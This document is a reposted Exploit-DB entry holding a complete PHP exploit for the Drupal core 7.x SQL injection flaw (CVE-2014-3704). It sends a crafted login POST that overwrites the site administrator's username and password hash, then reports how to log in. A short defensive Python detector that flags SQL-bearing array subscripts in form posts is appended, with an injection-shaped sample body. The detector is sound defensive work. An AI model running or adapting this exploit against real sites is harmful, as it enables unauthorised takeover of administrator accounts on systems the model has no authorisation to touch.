
Web application vulnerability: Drupal Core <= 7.32 - SQL Injection (PHP)

2014-10-17 19:55
<?php
#-----------------------------------------------------------------------------#
# Exploit Title: Drupal core 7.x - SQL Injection #
# Date: Oct 16 2014 #
# Exploit Author: Dustin Dörr #
# Software Link: http://www.drupal.com/ #
# Version: Drupal core 7.x versions prior to 7.32 #
# CVE: CVE-2014-3704 #
#-----------------------------------------------------------------------------#

$url = 'http://www.example.com';
$post_data = "name[0%20;update+users+set+name%3D'admin'+,+pass+%3d+'" . urlencode('$S$CTo9G7Lx2rJENglhirA8oi7v9LtLYWFrGm.F.0Jurx3aJAmSJ53g') . "'+where+uid+%3D+'1';;#%20%20]=test3&name[0]=test&pass=test&test2=test&form_build_id=&form_id=user_login_block&op=Log+in";

$params = array(
    'http' => array(
        'method' => 'POST',
        'header' => "Content-Type: application/x-www-form-urlencoded\r\n",
        'content' => $post_data
    )
);
$ctx = stream_context_create($params);
$data = file_get_contents($url . '?q=node&destination=node', null, $ctx);

if(stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) {
    echo "Success! Log in with username \"admin\" and password \"admin\" at {$url}user/login";
} else {
    echo "Error! Either the website isn't vulnerable, or your Internet isn't working. ";
}
?>



Source: www.exploit-db.com/exploits/34993
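A defender-side check for the request shape used above, as an added example that is not part of the original post or of Drupal: the request puts SQL inside the array subscript of the `name` form field, so this Python code flags urlencoded POST bodies whose array subscripts are not plain identifiers. The function name, the allow-list pattern and the sample bodies are constructed assumptions; running a Drupal release outside the affected range (7.x prior to 7.32) remains the fix.

```python
import re
from urllib.parse import unquote_plus

# Assumption: legitimate form posts use short identifiers or numeric
# indexes as array subscripts, never spaces, quotes or semicolons.
SAFE_SUBSCRIPT = re.compile(r"[A-Za-z0-9_\-]*")
SUBSCRIPT = re.compile(r"\[([^\]]*)\]")


def suspicious_keys(body):
    """Return (field, subscript) pairs whose decoded subscript is not a plain identifier."""
    findings = []
    for pair in body.split("&"):
        if not pair:
            continue
        # Only the parameter name matters here; the value is ignored.
        name = unquote_plus(pair.split("=", 1)[0])
        base, bracket, rest = name.partition("[")
        if not bracket:
            continue  # scalar field, no subscript to inspect
        for sub in SUBSCRIPT.findall("[" + rest):
            if not SAFE_SUBSCRIPT.fullmatch(sub):
                findings.append((base, sub))
    return findings


# Constructed sample bodies (not captured traffic): two ordinary login
# posts and one with a harmless statement in the subscript position.
SAMPLE_BODIES = [
    "name=alice&pass=secret&form_id=user_login_block&op=Log+in",
    "name[0]=alice&name[1]=bob&form_id=user_login_block",
    "name[0%20;select+1;%23%20]=x&name[0]=y&pass=z&form_id=user_login_block",
]

if __name__ == "__main__":
    for body in SAMPLE_BODIES:
        hits = suspicious_keys(body)
        print("ALERT" if hits else "ok   ", hits)
```

The same test can run in a WAF rule or over logged request bodies; it keys on the subscript, so it is independent of the SQL statement carried inside it.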
